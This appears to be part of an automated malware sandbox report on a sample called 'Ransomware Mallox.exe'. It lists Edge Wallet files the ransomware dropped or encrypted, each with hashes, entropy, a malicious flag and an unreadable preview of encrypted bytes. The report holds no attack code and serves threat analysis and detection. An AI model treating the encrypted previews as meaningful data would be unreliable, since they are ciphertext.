                    Preview:8.Y..?.K..)..B.YVs....6;O...!.r.s>7..M. ......l.....'*.......=...0.,.......eC\...P.."..5%.S..[..0.......j`.I%.......k..E......*.".......b............~.s..b.r..*;<4v.]..........I.{....*......Xn|_..._.L...`.Fa.t.w.%.*.#.-.K.l..2....<w?U.uw..C.b..".U"|..DC.#.OFD..se..R..til..FD.P..M.=..J.mvt.-!.....L.;u6v.._.f..c.....7.v..uV......f...+.....V[."..d....l\....A..&...?........=.0.S......(......C...p.w.7^......f.v..?^..u.tw3:.Dk.-...e.....@.H'.3Sq...k...Bq...D.......#&VqV..0y..t)f........G..?..0.O...;.&A^...)..s.hp]~ft.<.J..5......T...h....lo..t.Ha....&rU.b...a.ur.XO.. ?../`....7..S3.b.R/-...OX.......k....t..z....:....w...*h=.f....%#.B.....t.?.HC..gt..'..m......S..%.e.....O.].p.....;G"m6..A..E.....v0..=.B..G.|..U....N.. ....yc._.@.'m..w$Fd...y]0..6y..RX.P......P.L..........r+@..J&..}E.~....G.W....!*g.X..@...:el0.{g;|..v.OG..W r.S.9q9<A.OJ..r...p4.....a8...6..e..F..h8g.]Q..tI....g;h....$.*..c....~-)..in.5"!'.2*EJ.!.|.QW.....1.#1.,..~*..R../..Ca.0.....],Dt..^

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):59780
                    Entropy (8bit):7.996753928141469
                    Encrypted:true
                    SSDEEP:1536:HquGpWpCyczplRDgH8owCtWOyRaSOPJVJcJHeZjY:HxGpwCFlR85oONXhVKkZjY
                    MD5:A7889312463F14271562B3083A9BA49D
                    SHA1:8989ACFBE283C7E1B8EFCA777941281AE623A2B1
                    SHA-256:8D3AE6BBCDCAD72407456732E57B8B36D09D0FDB461A72416BE7E817AC247AA6
                    SHA-512:0036F02F5E9EFBB4E3D71DD2473EACA67A4957AD341719C0B62A8F86BC47A2597216D6FA465E3A33093E314442C02FBB718AD947F6E99144D40C22DCD88A31D6
                    Malicious:true
                    Preview:..iJ.LO.l......CK6..[g.K.mO.._:.V.lN...^.....a......m<...3....".....M....y[2..1..!$....Z0.@..C6.='.._.._.|E.Z=...=..LG.E......4.?.s...Q.hQ8.N..+V....YO.W..z.|....p.x.eqO...T...!!TS8O..I'.D.'.)Lt.z=?..Mr[.KGl8..../.Q.6..6....B.x...=r.qa....]K....~F.......{.wp........._!Z.cl2...i.+.Ho..)6Q....!5E].v.DM.*...bu9.#.t..G.C..Q.r.W{..A. Yz~..z..4!..,n.(ElY.&3....Oi...[.-..QiH....<^.v.!..r"......v.,..o....d .b4...!.6..bcE8(.....].q..b..}...H8:H&..q..FJ..?T_.......7./+PF.....g...$....>...-O.u_]T.s....%..xR.....;../{:..-...i:.c^:T.......iL4.....(......~.c]..rBG..G+]....Z^..'y7:..].k^..*....}.... l. .....6b.l........Mk....+...#.8D.....v.$...b[5F*...h..$.C.H.9P...e$~.dg2.%KkE@..CY.q.|QfK..J..H.@.!...o..}L./.@....T+....zi%..............:`>..Pk..[P....1.?..bl&... K.E.]...7.s...x....R?J....b.4...>;|.[.........D.O.....Y.3x.5..... .......s.)..x~V.G..kr..9}...d.C...$1...Z.Z..........w........U...P.(]...wo.0).e.3P.^....B.....z...,.............

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):60097
                    Entropy (8bit):7.997143372658634
                    Encrypted:true
                    SSDEEP:1536:sfAW+MHE8s97DBb3JdvvQE+OKyP3zpLx6H/aotl+cqL7c0NRfO:czVHAtbZdx+OH7pLAaCugURG
                    MD5:E7918AD849A2415B368D37F236658F66
                    SHA1:F6313FF8361C6D4B12DA218AEB0D7049C35F5229
                    SHA-256:58495E6E5C4F672D1E588288F273562836B6823B338049CF9E2FFAB10E676753
                    SHA-512:CD73756487D154C5B7814F281CCAE0B1B800E0D6A6591B393AD723C3F4D205E76B98579F8E1FA0E3728130BDC57CC83ACDC376BF8188152E0D661D59688BC21D
                    Malicious:true
                    Preview:5....dF.JU.=+O.c...g..3.....c...g.m.'....2.f@.Y......_.ul.N..`f.M9.43.T/......a3.["B.=.&.t....cZ.L..d.n.UagS)...&..\....K.t...r...Y..&.J@.(lC. z7L.x..O.......cU...q..2..,|..V..... ...D...N./...;.##...x.P.p?.b-m*}.Ksp....y..H=...`.eT.a.x..*.[......UO.$W.a....<."..Ev......,..ej9.....J.).....2KaW....UB\......."5./...$.X....|...5[*..y.\ u".k.........7.j.,....?{.....s.%.2# ..D....4...s..Ia..;..Ns....#..Ca...}o...=.'..:.z.........5..sS.._&;b...RK........G..H...M..!...+....{..s.;^..1.t..U4.........2.j...l..{..,%..uK......B.9a=...@../....g..Y.....a.R.......@..I_.<T.&..8ho6....8....~..]QW.[....v(...c.<._:>.....f.V}..s..U.7..>.1rx..D.<...bR .G{...E$>o.5....lF...F.`#M....X.V.d....W..T...^....tN....!D....o.B..>;YMH. .yQ..i.W0-\x:....T".P...y..\.9....#...T.)....*..S.....NS....=3N.y~.M...E.,z.(.b.............N...Xy.....U..)....l....tS+........z.p...$5{..........X...P...b......I..l.z.[}....q.....3Y...E.cv.D5.%..vs..y.1"..}.Q..T...[aK...5.2......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):61604
                    Entropy (8bit):7.996621739089687
                    Encrypted:true
                    SSDEEP:1536:IE4QRdP0r35DkDGDTf3MjWfu80qM2FJKMa6epY0/TqZQGVbYF:db6BaGDT/Yv80qMsJNa6PmqZfNY
                    MD5:893D15A86D8F12E39FEFC5C787E78284
                    SHA1:F486C0F8EA07BF19F970CED92FB46CF27A336F69
                    SHA-256:1B00F39EDE6EC459E854F3B937234D5AB1A13BD20CF4A8C7B37FF1AFB78AAA9C
                    SHA-512:6788BC1E2809D51CDBBCBBE8E5E5682B6A971047E1080E90EBEC0AFC57BE2FE06F8559ECAB84DAA74851562831BD9254F0E70F62B0C5CB0C7AAAEC11F56BFF00
                    Malicious:true
                    Preview:..V(..Y......tt!.{.....$..z..!#.).@...o.u....../......Y..n.[3nzm......0..^^..q.....T./m9/c.]....J.D...T.t.&....q&.......NP]...F #n...H....5..S..Jo.7Bq........G....~@.W...w..Z..N;.Dy.F%.z...r,.U.0.. l|Y...B,..k".r....x........y3t..R..X..+........z.V..r2.R.(.t.H.f.....AW..Q.. ... >o!.p..M...A.....L..e2.&............y.ER.S-..b........Nu.....K..-if..2.6Zz...!D...\.'f ...n.R.b.J......J.....G....{.Lb]>....\..........P.Q...=...._.]-..X>..?.....w.UJ+`......]Z..o..e...>!.u.1..:..m...5.cx....-0..o,.......2.....~...PUI....I?....\.p3.e....r...}....1..y..Z..x..0'?.<JF.....5..."....@........:/..k.).=...`z..I.Y.7(.n9.8Z....47..A-|o...^%.. .....;...1..F.}.0.&.........T....[.........G..."..n...hI.t.<.K...s.1.L\.N....o._0.!O...MzG.i.....=..a..9iv.E..Y&.....i....,.B.r.4..p.../...UY...0WY.2.0|.dc).L....:.~.Qz..Q.VZ..xl..g.P..p..m.w.....d.y.v..$.(+x..ut..B....$..u.0....t.....C.0T..!.......ph..:.d....Z....w..W..#/...sv.C.H.k.a..B.2....X.....f.4;4p

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):84150
                    Entropy (8bit):7.99799965203965
                    Encrypted:true
                    SSDEEP:1536:KgnM4sjASVAneHGkkqD/l422YzyOb5GCQSiKF02qdVZlTOBiu:Kgn+ESVAelZDtEO1wCXqXTYiu
                    MD5:509C284853F0F1696FB67B53B71FD996
                    SHA1:794EE0ED3EE3932A8EFF68EB0DC659359214F9A4
                    SHA-256:4F2A53732BF453BC382596A5E5F49C44B42C4B0AE919A7569E0D1E622FDE98AC
                    SHA-512:136724B4182E2A7502F93A6F422C23CA135D9DBB5F2E8403A40CE468A8C780CD38F204BBA8FAFE92754A4024E9F5F870609FA795AF50003CC6B0A0FB26A2BBB4
                    Malicious:true
                    Preview:.!y.Y....b....34..YN.G#...~.....7}M.5e.&....|...3..h.E.(.D...X......~..V4.z.7}.D.s..+..s.ny.;v.P.N...9............`$:.q.`w>...3T?'S......)y.5..b.{.<..gs..B.~.^.k.H..aG.^6...-^.."C.f..uu.>.t.......a[.R..}|]d..?.;R.*.?..`e.......\...Y.)......g.(sI"..S.[.H....K6.........}.S(..[....,..a.....+i.......Z^.P.....5.?o.R.........C..O...j..k-.l....oOo^...{......q..<......)..:.......".\...7.dC.]..R.eeI./4V.C..p.7)..J..6.6u.a?E...Ze_.fd,q...C..].33$..z./..7...9-.SD......./.,.%G.V......h/..Y..I.6....)80..g.....u=..I..*Y..5.G.o!...b...<....L.....?6DS...v.......b......}..HXO....1}..2.P./.^..+@.Dn...*h.JJ~....y.t.1..L......O.........w.m...+*7..}...c.^3c..\1...m.A..}...x..G-j...PS.q....;.X....!... ..ZD......V..f#pf.....?.u..lW.K.xk&..y..tk...V.+. ...r....v.5)...)..@...+.t.1%..|.Ce...9k(Wz.E.....~.J..f. .4...F..-...Y...}.z.....;......O.Vy.....t-...*.......e...*1...........K.y..O......!.|*.].4.N..:..Y.'...>Y.-.qxz.-Cv..\...w.-..7:.H...9%.......$.dIeQ

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):58956
                    Entropy (8bit):7.996498332618381
                    Encrypted:true
                    SSDEEP:1536:RzTTXl3KGg/n2TASgpyJQHRm2aoq+QHUt+jA6Ued:hRfjTzgHxm+q/Pzx
                    MD5:1E69CAEBB80C496BCD38A726C149A27B
                    SHA1:1EEF9786A0EA7B7E2C284671A6D6F398D49CB57F
                    SHA-256:F58506A98EDE28FDBDD7D3C611B389ED8B60ECE653D221F77A2C7A3A9702FB85
                    SHA-512:FF7662B9FEEB6FDB56F944054126AB2E3963768D72DEFBD83FB60A221D6E33C15467028459CB7CA666AE8CB7D91A136862D04F1A61D832DA109E9C2425242077
                    Malicious:true
                    Preview:....`C}D...2....=.......W..?eV.....C9+...k....\.8..p.}4..w..N.E.h..w2.....;...;$p..H!.kG......c:E.O-&......Ry..j ;#.Cx*5...Zw.^...Ra.5.....$.@..GZeP...3.y.V.a...+..1.(I1.k..F....u.!M..y.K.+::..QZ[H.`.....ut.~.i&.....qE4....1.....f....u....E_...c....M..<.*...;..0$....[.tn.d~.3?..b>XH..Q..J...i......f.....O..H..;...{..To...d......vBE_8]..;k....f!q.Bs...F...B..^.$.;o.3..6#.\$"a.5..O..(9..g...3Q"..i..tC.xO.C..ZGL........P.V:..3h..e../.(.9.L.'.._<.L.L%j.-#.A.O...@..}E..F(..x>.I...Q...&.]J|c...>.O...|...M...U......\...e.xp.g.....Sy.m#.y.a..w8..[|u..K..|,....?..d.0.*....rmJ.........;...FV......3X$R. .(.!...[+..[..^..#..G..6m.......4.Cpb.....F...bUN53}.C.@.~U{.;....".......u....N.-f./.B.M.........ts..[..ie.b......?.+.......Z.....c...h...Y..?..C~>......C.Y.t...#.<..u.5g......W. w+..|.......t..?...O..\.r.....G%@.q.51o._.....b...lh..q ...w,....2....u.,.9..x.. 2...5.Q$.T......tf....d...z.......d.u.\.4,..a..doV&..S........v..U...v.m..Q.R7...O.......;.=

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):52890
                    Entropy (8bit):7.996330465948828
                    Encrypted:true
                    SSDEEP:1536:kkVzPkl1TEHMShKmzQvYkSklmpofcXNY8EHCsJ5Pr9T:JlBrBIYkR8ofcXNYJxT
                    MD5:725D044A55A4246847465AFCF4E8CFE6
                    SHA1:98960ABF5C23D8E149D6F9AB6A34AD2407B006C4
                    SHA-256:F22993BC50E58B3E91916C403656998983702CFFA3BED29956BAFA82AF945262
                    SHA-512:DE87A3871BDBCBBBCDFD9B9BA20B71E6960E5BEE13AA3578A2A41FA35625E2A9648397F94616B049984284EB44CB8E108D50A0EDA844E9A52089F7D7A67F0BB3
                    Malicious:true
                    Preview:..T.)..4.)._...5U&.T.nm....{...P..bG...A....W.T.....L..5.....*.y).sT.]Nj#..Jy.......8zH...n..j..P.....&P;...Z...4c....&... rB.....E....Y%*..J%....u2..M.4an0peW0i.3.<.".t.."...M^.Q.W..=.{......p...Fn=.^{<b<...p.{..p.Ns....dU..#'.z.ewa )......d..>.b,x.J...c.W...2...)|.....,..-$.{?J...z........r.."C.;.s7h.(<BD...kBl.U..F..q...&?.......f#3Z{/^.O.y~..Py.Ma..m...>.M.....J.o.-... .u.^,.Z..`GC...-.R.3$..m.*Xt...2.2y...K...H..!G.g..vx....?..a.D...YES.a]......]..[.p0qfJ.e^....+..M'o..D.}...9..5a|y/..H....E...........%...<1kH-W..YBW......@m.(#=w...Z..>q..z...f.................-..-...SY4..:....V`.. ^..r6.@..{kOz...4..A.... ..w....K"...i..1XGARv....m..B...~~.cgx.h.5=Y..^..zJ....!J.]}..e........n;..U.....s..-./<.j..d.t....c.R..j....Xww...lo......d._.._....u.h.&....YXPA.....w..+...=.h.k..%(...DF!.(.....7!U-.Po..=..lp.3...tx.....*..6.bQ...5*.....n.5e.\.+.B..t4}...<..J........`#b.,...y..:.l6.....L..5...%.K..@K?......h!..{...l(..G.t.>m.z.h..8..+...y..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):54044
                    Entropy (8bit):7.996546391538985
                    Encrypted:true
                    SSDEEP:1536:IC5EsjiUGyekLDbvYN7/Q0u6NXHvij6Opt6Lq9I:I0xi6eSPuzFXH6Rt6Lq9I
                    MD5:FECE46FD56DAC6F9C12D52D1F6192A97
                    SHA1:458766FDDC1E2A7FFFFEF92B79972139F71E42AD
                    SHA-256:3C70FD54331BC8BB4B1C39DF8B3987FD3BD85951CE1642FCBA73B7825A8B701E
                    SHA-512:B0EC38B78FEB5E6CF652BF21407FD3CB2E98297FC327A9C3C604B8681955B0DB5AC29682F077ACA97242A848FCD0703D21545CF7523B578A8485A76FAE80009C
                    Malicious:true
                    Preview:....&....T...8QM.?....GL.M.n/K...r..5..5...h.....z".....p..I.....^...Y......_</x9G.."9..jI...%.E.....y..2J._......F...|......W.......\.^g.....H.5iI......(.-......s..0 .....!).........:...2%..T..,Z.[h.Y.p.N;C....bj.7'....H...P......$.v..D6.o...5IA.........k#o2..@...B.X:.-.........]....j..[.:.,*).p.....2...."..p.{p.g..S...Q.sR.I.&.!.w....Q...M.J.\.VE./.Q....v`....\...b3..0.g..b..x.<...:Y.5..$".JzY$.Ow`..,Y...o.~t..C..r.....n?...V+..9.%.....}.......9. k...f..rNf}l?a....a6q.f{......3..kJXm.;.*>L.&.,|.?......Q..${...F... .....,.e.T8HR...C%.]'qA..t.A3YF.=.m....... .t.l..xD..Ym.....sJ...,B.j:...kB....A...*@.VQ........Lhp.?..=.c..].V=.!.5..L.*.....^@.h..X.EW...^..FL..?...TU!z..E...2R.N'].....b..6..f.....a.o.......W..._N2.J.ND...V....Q...3..!j..c...o...-(....(?J.I.nC!.....Z.]..8.....<..M<.C.R.z..D"...`}0K:..5.Z... ...w...8n....)............&..M..^...A..F.Y....D0Q..SH..`..h3.gX~R.i/..;.0u.A...`.[:.....HK.P4wo..M?.'...;o..P.....e..j.J>.\..6...2@GO

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):10800
                    Entropy (8bit):7.9842695309455785
                    Encrypted:false
                    SSDEEP:192:zdN3D+vPZRIzQly/yRfx2jf1uKCQrvjG9/2WOs3xmVQqmwRADlwaM3E1H1gSwlj4:zyvBQ64QCq9/2Wn8mwRmwvEq8l
                    MD5:25CC2465AA755BC5A004BBAFE13FC430
                    SHA1:27242A6EC328D3D7B959AED7C4209B4C793F00AD
                    SHA-256:482FFCF3B2D1E4A69CE3C495B02030E8C7F1317A195B4379A05E5C348321C390
                    SHA-512:EA8301729B79B91A4E0CE0DBE62268339190D9730A1445A092CB3F8595A0B971337B530621847EE0C1606A6465A8662B8157D44150A0FED358DFB92938D00ABC
                    Malicious:false
                    Preview:.5...v~l[.}.YV..#.t..@.@.........p.0...;.t..zs.u.C......<.a....Q..&.l..2..V..xr..s.....Z....7.x.7w~g......%..Q".....;N...J.....G/$...{.j/q@5.#.{*.}.r...4..k....-h^..cNV'..j..B.....1...D.j...l_B.........f...G...V...S...<.W.y......R...........\...|gD.I.d..nm..Y........r.'........D....._."@!m..dx{..w...V...@?...3..X9; oR...)..hi.......p.*l...y.L.......?;..]..#.;..V....{.B..t......FQ..=.......A.u....;8..\.IW5z*q...[...>Bb........t}...!8X6h.wIP.I0....!e.W. ..A..9P==....6j........w..'..e.2.......M...Y.....[o.L.)..VZ*..I...>..^.K..T,.P{..\<.40. ..x@X..hl...S:.Q...O..qm8.\.Y0...M...F..Fm...n?....~..L4.A>.!.Tm.l...F...Hx.k.jQ...8..$....X.8.Qe.o.H[..Rh.tw&.[.....R..*..$...1..*jj..T.(.n........-n.--l2ES..`.%.........)E.m.Kb.)re..Y....g....5..PI..\......tt~.....6(pjS.5=.|l.p.r.o.....;]......m....-............>.S.l.t...|....Hn.+0....X .u...B..a.......o.'..*.....0.s7....X..R...3...EZ/....t.......V&).....6.`i3.....#.:...S..~..'...pxZ.S.;....+'9.>....DB.T.~.a.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ru\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12423
                    Entropy (8bit):7.982990165414812
                    Encrypted:false
                    SSDEEP:192:vjNf5oqUeOsZUjnwrRkpPajyZV47EPsBsNfbYRGKJNpQXpJqxjPKzSWi:7NrzUTwtmak2QD8GCNif8PDT
                    MD5:55492A32EB098743331639C8CB6024F3
                    SHA1:35C368C705A602EE5A5A47E827AD09B88E63E8B6
                    SHA-256:5B53D754D9E2F6FC2327B31CDEC5F7AD806A9ECF9B76BB15769830254D1B6A20
                    SHA-512:6D10685F759FFDE6415DD4B63824C17934A15A2AD09423ECFB283A8E095FAD36D141EA28F47F5816F9644EF942E9CA7D257EDD6310C2AB85262FBE00AE4FB0AF
                    Malicious:false
                    Preview:.d}.......O...~.EVe.x^..Q+.l.......`b..K..#.f...(.Q..%.'...j...'.t[DF.Z...-.`Q..M.b..l./...&..........v......A.h.Sy7|..xLJO9.;.]".....&..[>...v.8...#...e...8......UA~..S/`...W.j...i].G:...W..KJi.ou3..BAE...{..(6.e<.U{f...].r...;M..\.&..q..T.~5J^.Oh6..M...i$.^.f.v#h....n.\]c..i.L\...F.....K..|.....x...T#?..Q\....5..$..G7^.= ..X..>...8..U.J......$;.f..s@.... .........A......m.:.^Q......A1..2.......*";..kf.v.....&.-..?..p..qr[................L...e./75z..[.....^.:..>.D...R}...E!r.......".f|.....Hw....b5.z...,.<.k.kD.";..D..v%.<...Hv.v.....8...8.i.k...4......)..+.-.HdU..X.....V.y..>......>p)...2..4....nq.+.=....H..A.)n...S...@......Y..U.{.!.j.)....K.nm..x....ulm..K)W..r.$yQ.Ls.G..u..~r.o.[..r-".<L.j..j..(.....s.A(.n....>G<qq.X.N.,..i.w.e......1*U..Og..X.Ar,p....?.L..2B..^.e~.4<K.&>...\..qy.PI.YC0%.f.....u D[..~}......%.g.z..?M.i.A....~....h.y....7....Ju....wf..o..:^.u.....B(..[r........SJ.?."?.8.-7..l.....N.u.G.e...,.bd[....f30.3.t

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20784
                    Entropy (8bit):7.990602322188238
                    Encrypted:true
                    SSDEEP:384:G6JDV5ZtbWyYDCCAPuyxHT4uEzUgkZXvO/i3tmYUDXKN5486li0U:GODr3bWfYauQ8/O/qmYUrYp6g
                    MD5:F1A6F839EA62F4D5DEEC950F9E94F404
                    SHA1:BA4BBD30241785338BCCAC5366DF935B6F192A94
                    SHA-256:82C20007730E67E06123BC0CAFCDB0D44ADD485CF311F554515FE83D52848621
                    SHA-512:B72028EDCDA1D39A53D9AAFE95E95AB08F7B3DCE5D6B5F017C24A94D5A03AC74ACFE3D1416BDA65977FB5D7EBB96F23111135A1677AFE26D3A92BBCC1E7FDF1B
                    Malicious:true
                    Preview:.xE. ....S.KT.@F{P.3Q..n...}?]<-.~.$.8?..i..S.....|...Z...".!.H.....$b..iv.K....r &.>..`.......U.oB.^z.|.C....-.l"....0...w\.....R...Fw....O.[.:.J..u....;#.....l.:.&.P[/... 'x...w9...o....f,.'..._...fE.d..>V.;.....U.......00..5h....Q..8..K-^.0.^.e..BI.W...j.] Y.;.:q-....h.q.5,.....$..z...\MH..".I..W..)..D...U_.O....<(Z....5i.b.....O...W8.t.y....,P.K.......U.W..4P.7Jn..?X..".$U9....?.pb.u....(;."B=...(..N....r...A....l...g..?. ...2.((..Zf$=.~?.....uP<.l....._.ojn8[N..!C)+.p/0$....1r[.......@.d.]GX.*'@.....O.Q.oA..p.M.H......`.Mc^....3..p...|..u..s..\X..8....sg.m....SK..4.....*.L.=.Y"..".4..7..?.{3.!..q|\x.Y .Vj..^...'....+~..&.ce.6.........72.... H?I.x.......L....NIPC...^s.4..W...b...^...4h;....(.v.K..y."....nj6.......@...%..a......R."/.p_.xn..;....6....Z.....qI..N?.......'Ska.O.6........|....l.lO._...|.LL......v............E.s.{._~...v<.$.x.U...H.u.)......Z.HW.3e.Y....=...X.....a._H..'Y;,&B...(.C.u.`.*?..]F9.v.....h6%|..+37.<..r...v...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):148401
                    Entropy (8bit):7.998722593575405
                    Encrypted:true
                    SSDEEP:3072:emb7IzsVEyClXYaKNrSDXhabfeAOykHMOAaLe3ULIjHkph1kBw1q:embMYVEyaIHNODobfeAzJmXLIbkph+uk
                    MD5:2D7B01AE4BCB821A399FBDA042636A56
                    SHA1:5838F4545871422AADE3BB178E1CC241AEA7E995
                    SHA-256:9DAF062F76D334C598077ED28DD64B6BAFD2BD54C590216587489A42CF10A2CE
                    SHA-512:B90E2BB9902C7E06BBD2478A16971CC06695B9B01DE902883A501B33CF0A673A758A58A892B6E55C216B0603656EC40CA1B11B574E0CFFC18C9882AB1DF1C891
                    Malicious:true
                    Preview:f.[#...L...^D..Z...!Chw9.F.+HF53..z..Y... ...0A....lR`....G....e....)C....G..0.!Q.W6...B\.j.>......u.D..T....v.....od..)!!..F.....4....CF.y.p..... .n(0......P^.e4....!.....#.nV...x.*...m.q..dab...pn..[....QF....[S..v....8...v.}tn..Nv....I....4.S.MW.r... .7.G.H.H..&...y.}]..P.'......(.f.s.. .U.-.\HSY./+.5U.K.....q..C...~.s!(">.......}....Z..r...R\l..5...VQ.-./.1.. ~....h......r....e....:R&...v..@FJ...S?i....-2....jx.......bP..J.2@..&...S~.Dp.....H...........-.....A.....[a.W..$.D..}.M.(O..dM..q..#..Ju....2g.[..n...\.R..?.".3.....1.P.<......&K..8?O.A.........u.4B......#.&..c.m..s[...8TW.u.....&.^V...id0.Z|t....r.^...Y|.V.o..t..^...T,.J.&..gu.wo.!.wO.F...+...qUm9..48I.^....A..W..KM..4.W`KC?{.....;.zD-..N.Jl}....u..Dq.~.nO...H..PM4..MX.....w+..q.x/..E#..u=c.....;..>.".S...bv....'3.k.....U...f...L..7.V..;18.....@zJ..Za......exs_...'..4s..?t.\3.k....[..$....1.7..((3...Yo.A.}..}...#`..Q.n.v..?o..N..ZT......\..^...F!.JE._/......v[...Wl...o.U..8.(

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):511475
                    Entropy (8bit):7.99967112013042
                    Encrypted:true
                    SSDEEP:12288:dbhE/4XhVdh+rW0GHQnt3hKS7eCkffEwIiP1:8QXhVd0S0GHQTK4eC6SiP1
                    MD5:AF1B7DCD938A765E6F4A6E4D51725C17
                    SHA1:7C238A3C85F96DE68A745FED44680A33B029DE51
                    SHA-256:9D43D9B27508B1DC835AAEC29128BE8BC0080C65A2488DBCBEDF8F214654EEE5
                    SHA-512:F1F61F5B2BC6C480B2DD3AE7E48AD493A7FC94B01D565FD382DD2804DBE4450AE236DBEC75936826E67696F0E02C214199E523892C3561666BEE20B541042ACE
                    Malicious:true
                    Preview:,.7].c..e`l*w$..T+....n.q......m....?...9td....d.v.S..B.........>./...$Yq l.+....w.O=d.~.....W.H..;)...<.....Pu=[.n..c......,.6Is.! ....N.$..."....E,.a...U.X.xE4.....X.'.YG..|..P..T.....rL:......kZr...jsM..'i..F s)t0nvD`.z,..xe.P'.=....BP..O. ...\..z..n.l.MhV..bu...y..9..2+.$..W..h..r..q...e. .]D...... ~........R..Z..m.?$.-..9O.qL.F?q..q..l.P.7......!.....!.{..=...H..k[.],...}.6.\o.%V.+....-Z....[wz..j.Z.F.V.e.s.V.4,..W&.........W..g.k...s.f..3J$s......Y... j..u..........1..n'.k......C...h$.d......$?.c.B.[H..O@.27....2.9}....3|Xq....W..(..l..g2..."..q...E.>)"...x.n.n.....W...._.....u...... an.....y.9V-...J..j..k.Q......x...@w>.$Bewg.s.n.R...........*./.ZV........aI\O5...3.i.qC.$1n.4.Kn...x....k$.}..c........S.3a68.....{.~m.$6.w.O..g.g....MDm&....!.. ...T.....rl+.c......K......Qoc...V..J;.K.4..e.8.....*...g...`.@.....'.j...?...Zj..P.\..6$..-...g#.&?X.3Nc..Uc..FG.z......!c........V5..Z....7j...................f..P........!...$.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout\checkoutdata.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):40137
                    Entropy (8bit):7.995614677938172
                    Encrypted:true
                    SSDEEP:768:+JDAXt9sGyfYv8wV4mKCUfWr01KYk6ppbCx8N1OsyCWGoRJOwGsY6BLd:+Nat9sGvv1VvuYYk6pp7N1s1OwG/6z
                    MD5:22FE777C52CC2F968D42B7977CCABCF1
                    SHA1:72E496C0A5EB0943C7820FA0415509B779DFAA94
                    SHA-256:726969C04F76E15AF889AFE9C3DD0C8438068EA32DFE3F8ECCFDAD72C38A240B
                    SHA-512:E465FF1EE43B5105BD0CC5D01A1E839381DD98BC2698B9A6A6D523287D6714442480DA6972CC78DA30CF3F9BF546DB8AD54D240CB496E184FE15AFC9C55B4E73
                    Malicious:true
                    Preview:..o.bg4.(.a.7..'...z.,.T{....$;>...qkES......1..<=Sl.i.".....`..Lk=..EfTfL...e>(....gTq[.dE.0..{y.....N....%`C.hr.,k....q.u}G...y.......ZW"..T.x.W..>......YS.G'u....@Spk....n..bf.Y.}+Sx[............n2&p1...jr+.3{. .<7.m.......k..X...3B.........w.7.........YKk.nHp.\1T...p.d..a......a....zP...D.D....&.x"R...SNqS.(_.G-.k...9'......@.l.....hGd..v...5..u.h].^[.............*f..8."7....L..S.b.....A.........B.......R.dlI.......cj.(t:e...6.E...'$.^....8..IO..E./....?.....L0.+.t.&...Q....x.Sw..(.....-E.....O..Q....>..Of!...OGc.8.-..9.2.F..]..H5.#...4).D'].CL..IT\.b...2....s.;F..7e.q.e.y.WD...q.s...KtD...|...M>G....M..."bos.3(.... ....G.I/..6.O.....3.. ..<..m.-.k.._.?..C5G.....,~.Vj...8.tm<.......}s....3...d.S{..e...u.mb<R.;.2....b._U..l..WQ.X.r!...xe.....1....i]..r.p{.f.#.xF.3....q.Z?K.ss.{(..-.A.8.'D..Q.1(...K.?.......Z.o..Pup..<......H....`+.o......Q...M.e....u.GP}.Ht..'0.egW.x.l.N.....&..M....wT&.~.[V.."...`.{.....|.8\]h......@....'./.:pv.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
